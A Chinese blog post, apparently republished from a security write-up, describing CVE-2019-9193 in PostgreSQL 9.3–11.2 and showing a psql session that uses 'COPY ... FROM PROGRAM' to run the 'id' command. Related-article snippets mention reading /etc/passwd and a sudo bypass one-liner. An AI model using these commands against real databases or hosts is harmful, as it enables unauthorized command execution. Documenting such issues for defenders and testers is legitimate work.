CVE-2019–9193所谓的psql的提权漏洞?

最新推荐文章于 2023-12-23 00:32:38 发布
最新推荐文章于 2023-12-23 00:32:38 发布
阅读量1.2k 收藏
点赞数
分类专栏: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/caiqiiqi/article/details/88857650
版权

来源:https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5
翻译:https://nosec.org/home/detail/2368.html

描述

PostgreSQL 从9.3到最新的11.2版本默认开启,影响Linux,Windows,和Mac。可从SQL语句执行权限的用户提权到系统命令执行权限。

$ psql -V
psql (PostgreSQL) 10.6 (Ubuntu 10.6-0ubuntu0.18.04.1)
postgres@ubuntu:~$ psql
psql (10.6 (Ubuntu 10.6-0ubuntu0.18.04.1))
Type "help" for help.

postgres=# create table cmd_exec(cmd_output text);
CREATE TABLE
postgres=# copy cmd_exec from program 'id';
COPY 1
postgres=# select * from cmd_exec;
                               cmd_output
------------------------------------------------------------------------
 uid=103(postgres) gid=118(postgres) groups=118(postgres),105(ssl-cert)
(1 row)

在这里插入图片描述

caiqiiqi
关注
专栏目录
SeImpersonatePrivilege权限提权(Server 2019
墨痕诉清风的博客
04-23 1147
SeImpersonatePrivilege权限提权
postgre提权(CVE-2019-9193)
weixin_45701675的博客
11-18 1246
PostgreSQL是一款关系型数据库。其9.3到11版本中存在一处“特性”,管理员或具有“COPY TO/FROM PROGRAM”权限的用户,可以使用这个特性执行任意命令。 提权利用的是漏洞CVE-2019-9193 CVE-2018-1058 本次演示CVE-2019-9193提权 复现步骤 开启测试环境 连接postgres 新建查询,执行 尝试读取敏感文件 cat /etc/passwd,低权限用户无权限查询 测试成功 ...
CVECVE-2019-9193:PostgreSQL 任意命令执行漏洞
边扯边淡
08-01 3789
CVECVE-2019-9193PostgreSQL任意命令执行漏洞
buuctf [Postgres]CVE-2019-9193
qq_1873822的博客
04-02 583
漏洞描述 PostgreSQL( 读作 Post-Gres-Q-L)是一个功能非常强大的、源代码开放的客户/服务器关系型数据库管理系统(RDBMS)。采用类似MIT的许可协议,允许开发人员做任何事情,包括在开源或闭源产品中商用,其源代码是免费提供的。 PostgreSQL特点: 支持WINDOWS、Linux、Solaris、macOS 、BSD。 支持文本、图像、视频、声音等 支持ACID、关联完整性、数据库事务、Unicode多国语言。 支持临时表,与物化视图 支持SQL的许多功能,例如复杂的SQL查询
CVE-2019-9193)PostgreSQL 高权限命令执行漏洞的复现
最新发布
m0_69801663的博客
12-23 1146
CVE-2019-9193)PostgreSQL 高权限命令执行漏洞
CVE-2019-9193 PostgreSQL 高权限命令执行漏洞
qq_51979295的博客
10-08 692
康复训练
CVE-2019-11708:针对Windows 64位版本的Firefox的完整漏洞利用链(CVE-2019-11708和CVE-2019-9810)
02-04
CVE-2019-11708和CVE-2019-9810的全链漏洞利用 这是针对Windows 64位Firefox的完整的浏览器入侵漏洞利用链(CVE-2019-11708和CVE-2019-9810)。 它使用CVE-2019-9810在内容流程以及父流程中获取代码执行,并使用CVE-...
Jackson 最新反序列化漏洞(CVE-2019-14361和CVE-2019-14439)
05-08
Jackson官方github仓库发布安全issue,涉及漏洞CVE-2019-14361和CVE-2019-14439,均是针对CVE-2019-12384漏洞的绕过利用方式,当用户提交一个精心构造的恶意JSON数据到WEB服务器端时,可导致远程任意代码执行。...
SweetPotato:从Windows 7到Windows 10 Server 2019的本地服务到SYSTEM特权升级
03-19
甜土豆 从服务帐户到SYSTEM的各种本机Windows特权升级技术的集合 SweetPotato by @_EthicalChaos_ Orignal RottenPotato code and exploit by @foxglovesec Weaponized JuciyPotato by @decoder_it and @Guitro along with BITS WinRM discovery PrintSpoofer discovery and original exploit by @itm4n -c, --clsid=VALUE CLSID (default BITS: 4991D34B-80A1-4291-83B6- 3328366B9097) -m, --method=
第22篇:一次艰难的PostgreSQL不出网提权过程
ABC_123的博客
09-15 1176
Part1 前言在日常的内网横向过程中,对于SMB、Mysql、SSH、Sqlserver、Oracle等服务的弱口令爆破是常用手段,重复的红队攻防比赛使得这些服务的弱口令越来越少了。所以在平时,ABC_123也会关注一些其它服务的弱口令提权方法,有时候会在内网横向中收到奇效。本期就分享一个在内网渗透中,遇到的PostgreSQL数据库提权案例,过程非常艰辛,但是收获不少。首先简单介绍一下当时...
postgresql 查看用户密码_PostgreSQL任意命令执行漏洞利用(CVE-2019-9193
weixin_39539563的博客
11-24 523
最近没事曰曰内网,偶然发现了一个使用空密码的pg(是的,连爆破都省了)。用navicat连上去看了下几个库都是一些业务测试数据,没什么好收集;不死心,google了一下发现有个比较新的CVE好像可以操作一下~漏洞概述最近,安全研究人员披露了PostgreSQL实例代码执行漏洞CVE-2019-9193)的漏洞细节。具有数据库 服务器 文件读取权限的攻击者可以利用此漏洞执行任意系统命令。从9....
CVE-2019-9193 复现
qq_41252520的博客
08-24 900
CVE-2019-9193(PostgreSql 命令执行)复现 0x0 简介 PostgreSQL作者称为Post-Gres-Q-L,是开源的功能强大的关系型数据库,支持SQL语法。在9.3版本中增加了一个COPY TO/FROM PROGRAM功能。该功能允许数据库的超级用户以及pg_read_server_files组中的任何用户执行操作系统命令。 0x1 影响版本 9.3-11.2 0x2 环境搭建 这里使用的是vulhub环境,进入到vulhub−master/postgres/CVE−20
漏洞复现之PostgreSQL任意命令执行(CVE-2019-9193
Blood_Pupil的博客
05-09 5575
PostgreSQL任意命令执行(CVE-2019-9193) PostgreSQL是当下最流行的数据库系统之一,它是 Mac OSX系统下常用的数据库,但是同时也提供Windows和Linux操作系统版本 今天,我将要给大家介绍一个PostgreSQL的鲜为人知的特性,这个特性允许数据库的特定用户在PostgreSQL环境中执行任意代码并且在PostgreSQL 9.3至最新版本(11.2)...
CVE-2019-9193(高权限远程命令执行漏洞)vulhub复现
qq_52279315的博客
05-17 620
vulhub靶场复现【postgresql】
PostgreSQL 高权限命令执行漏洞复现(CVE-2019-9193)
又菜又爱倒腾的博客
10-29 1835
#PostgreSQL 高权限命令执行漏洞(CVE-2019-9193)# 一、漏洞简介 PostgreSQL是功能强大的数据库软件,可在所有主要操作系统上运行,包括Linux,Windows,Mac OS X等。所公开的漏洞存在于命令“COPY TO / FROM PROGRAM”中,用于导入和导出数据。在“pg_read_server_files”组中的用户执行上述命令之后,可以获得数据库超级用户权限,从而执行任何系统命令。 二、漏洞影响 影响版本 PostgreSQL 9.3-11.2 三、产生原因
漏洞复现之PostgreSQL任意命令执行(CVE-2019-9193)及被勒索回忆
qq_31042199的博客
08-15 1960
为了复现这样一个漏洞需要首先配置目标靶机,整体测试环境如下: 漏洞名称 CVE-2019-9193 漏洞影响PostgreSQL版本 9.3-11.2 漏洞影响平台 windows+Linux+Mac OS 测试硬件环境 win10(家庭版) 虚拟机版本 ubuntu18.04 本次PostgreSQL版本 10.18 win10与ubuntu虚拟机连接方式 桥接 kali攻击机ip 192.168.31.68 靶机ip
【vulhub】PostGresql高权限命令执行漏洞复现(CVE-2019-9193)
errorr0
08-05 855
CVE-2019-9193
linux sudo提权漏洞,linux CVE-2019-14287 Sudo提权漏洞(示例代码)
05-19
CVE-2019-14287是一个sudo提权漏洞,攻击者可以利用此漏洞绕过sudo的限制,以root用户的身份执行命令。这个漏洞影响sudo 1.8.28版本之前的所有版本。下面是一个示例代码: ``` $ sudo -u#-1 id uid=0(root) gid=0...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值